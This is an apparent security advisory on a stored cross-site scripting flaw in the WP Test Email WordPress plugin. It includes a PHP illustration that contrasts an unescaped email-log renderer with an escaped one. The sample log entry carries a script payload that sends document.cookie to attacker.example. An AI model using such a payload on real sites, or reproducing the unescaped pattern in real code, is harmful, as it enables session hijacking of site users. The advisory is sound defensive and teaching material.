Impact
The WP Test Email plugin for WordPress fails to sanitize input and escape output in its email logging feature, which produces a stored cross‑site scripting (XSS) flaw. Unauthenticated attackers can inject arbitrary script into the email logs; the payload is stored and later rendered, unescaped, on any page that displays those logs. When a legitimate user views such a page, the script runs in that user's browser with that user's session and privileges on the site, so it can hijack the session, deface content, or stage further attacks; an administrator reviewing the log is the highest‑value target. The weakness is classified as CWE‑79 (Improper Neutralization of Input During Web Page Generation), the classic XSS category.
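The pattern behind CWE‑79 here, shown as an added example in plain PHP. This is not the plugin's own code: the function names, the log field names and the sample log entry are assumptions made for illustration, and the stand‑in definitions of `esc_html()` and `sanitize_text_field()` exist only so the file runs outside WordPress (real plugin code calls the WordPress functions).

```php
<?php
// Added illustration, not code from WP Test Email: a minimal email-log row
// renderer in the vulnerable form and in the escaped form. Function names,
// array keys and the sample entry below are assumptions for this example.

// WordPress supplies esc_html() and sanitize_text_field(); these stand-ins
// approximate them only so the file also runs outside WordPress.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) {
        $str = strip_tags((string) $str);
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);
        return trim($str);
    }
}

// Vulnerable pattern: stored log fields are concatenated straight into the
// admin page, so any markup that reached the log is parsed as HTML.
function vulnerable_log_row(array $entry) {
    return '<tr><td>' . $entry['to'] . '</td><td>' . $entry['subject']
         . '</td><td>' . $entry['sent_at'] . '</td></tr>';
}

// Fixed pattern: every stored field is escaped for the HTML text context at
// output time, so a payload already sitting in the database renders as text.
function safe_log_row(array $entry) {
    return '<tr><td>' . esc_html($entry['to']) . '</td><td>' . esc_html($entry['subject'])
         . '</td><td>' . esc_html($entry['sent_at']) . '</td></tr>';
}

// Defence in depth: also sanitize when the entry is written. This does not
// replace output escaping; rows logged before the fix still need it.
function sanitize_log_entry(array $raw) {
    return [
        'to'      => sanitize_text_field($raw['to']),
        'subject' => sanitize_text_field($raw['subject']),
        'sent_at' => sanitize_text_field($raw['sent_at']),
    ];
}

// Constructed sample: a logged message whose subject was attacker-controlled.
$entry = [
    'to'      => 'admin@example.com',
    'subject' => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'sent_at' => '2024-01-01 00:00:00',
];

echo vulnerable_log_row($entry), PHP_EOL;               // <script> tag reaches the browser verbatim
echo safe_log_row($entry), PHP_EOL;                     // &lt;script&gt;... is displayed, not executed
echo safe_log_row(sanitize_log_entry($entry)), PHP_EOL; // tags stripped at write time, still escaped
```

Escaping must happen at output and must match the context: `esc_html()` for text between tags, `esc_attr()` for attribute values, `wp_kses()` when a limited set of HTML is intentionally allowed. Sanitizing on input alone is not enough, because entries written before the fix remain in the database.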
Affected Systems
The vulnerability affects the WP Test Email plugin for WordPress, by boopathi0001, in all versions up to and including 1.1.8. Any site running a version in that range with email logging enabled, so that messages are stored and later displayed, is exposed; a version above 1.1.8 is outside the affected range. The CPE mapping identifies the plugin package itself; WordPress core is not the affected component. The installed version can be confirmed on the Plugins screen or with WP‑CLI (`wp plugin list`).
Risk and Exploitability
The CVSS score of 7.2 rates this issue as High (the 7.0–8.9 band) rather than Critical, and the EPSS score below 1% indicates a low estimated probability of exploitation in the wild at present. The flaw is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, so CISA has not recorded confirmed active exploitation of it. An attacker needs a site that runs the vulnerable plugin with email logging active and a way to get attacker‑controlled content into a logged email; once the payload is stored, it fires for every user who loads the page showing that log entry, with session theft or defacement as the likely outcomes. Because the payload persists until the log entry is removed, the issue should be fixed before exploitation is observed: update the plugin, and review existing log entries for injected markup, since a fix that only sanitizes new input leaves previously stored payloads in place. The damage to user trust and site integrity when stored XSS succeeds is substantial.